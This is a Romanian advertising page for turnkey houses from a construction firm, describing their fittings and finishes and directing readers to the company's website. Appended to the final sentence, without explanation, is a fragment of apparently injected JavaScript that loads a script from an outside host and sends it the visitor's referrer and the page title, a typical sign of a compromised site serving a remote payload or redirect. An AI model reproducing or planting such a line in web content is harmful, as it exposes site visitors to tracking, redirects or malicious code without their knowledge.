case la cheie

case la cheieImagineaza-ti o casa in afara orasului, departe de zgomot si de praf, departe de cotidian si de stresul traficului aglomerat. Adauga un teren generos, cu o curte mare, decorata cu flori dintre cele mai diverse si foisoare unde linistea este la ea acasa. In final, gandeste-te la un camin calduros, amenajat cu cea mai mare grija pentru detalii si pentru confortul familiei tale. Acum revino la realitate si afla ca te poti bucura de toate acestea incepand de…maine!

O casa la cheie iti ofera posibilitatea sa te muti imediat, fara grija santierelor, a termenelor limita sau a contractelor cu furnizorii de materiale. Mai exact, cu o casa la cheie, visul iti este ¨servit¨ pe tava.

Comparativ cu o casa la rosu, casa la cheie dispune de toate dotarile necesare, adica  instalatii si finisaje. Ce inseamna asta? Inseamna griji mai putine si cheltuieli tinute in frau.

Pentru case la cheie si vise implinite  inainte de vreme, Ramco Group Business Solutions iti sta la dispozitie, oferindu-ti tot ceea ce ai nevoie pentru ca viata ta sa se schimbe de maine!

Case la cheie-Efort zero, satisfactie deplina!

Cei care aleg sa construiasca o casa in regim propriu, au de dus la capat o misiune dificila si costisitoare din punct de vedere financiar si nu numai. Sa fii martorul unei lucrari de constructii de la A la Z implica efort, stres si cheltuieli majore. In fond, nu este usor sa te ocupi de fiecare detaliu in parte, incepand cu materialele pentru fundatia casei si terminand cu instalatiile sanitare si de decor.

In plus, trebuie sa gasesti furnizori pentru fiecare etapa a constructiei si trebuie sa pornesti goana dupa oferte. Rezultatul? O casa cu buget depasit, construita pe sudoarea proprietarului.

Acest scenariu poate fi evitat daca alegi constructia unei case la cheie.

Ce trebuie sa stii despre casa la cheie?

Casa la cheie reprezinta o casa la rosu la care se mai adauga lucrari de finisare. Pentru o astfel de casa se executa finisajele interioare si exterioare, se monteaza instalatiile sanitare, electrice si termice.

O astfel de constructie include elemente ca:  invelitoare acoperis, geamuri termopan, tencuieli exterioare, izolatie polistiren expandat, tencuieli interioare, gresie, faianta, parchet, usi, chiuveta, cada sau dus, vas pentru toaleta, robineti bucatarie si baie, racorduri, centrala termica, calorifere, intrerupatoare, prize, retea electrica.

Case la cheie si la preturi excelente, doar prin Ramco Group Business Solutions

Casa la cheie a devenit o solutie extrem de populara in randul celor care stiu sa aprecize calitatea si functionalitatea unor elemente esentiale confortului. In plus, ai garantia ca totul este proiectat conform viziunilor tale.

case la cheie

Societatea Ramco Group Business Solutions isi desfasoara activitatea in domeniul constructiilor, oferind o gama larga si diversificata de servicii de exceptie atat persoanelor fizice, cat si persoanelor juridice, la cel mai bun raport calitate-pret.

Cu noi ai certitudinea unor constructii sigure, moderne si functionale, proiectate in acord cu cele mai inalte standarde de calitate si intr-o perioada scurta de timp, cu materiale de top si  costuri mici. Pe scurt, iti oferim cele mai bune variante pentru ca visul de a locui intr-o casa perfecta sa devina realitate!

Pentru a consulta oferta in materie de case la cheie, acceseaza www.ideal-constructii.ro si contacteaza-ne. Iti asiguram accesul la oferte personalizate!s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;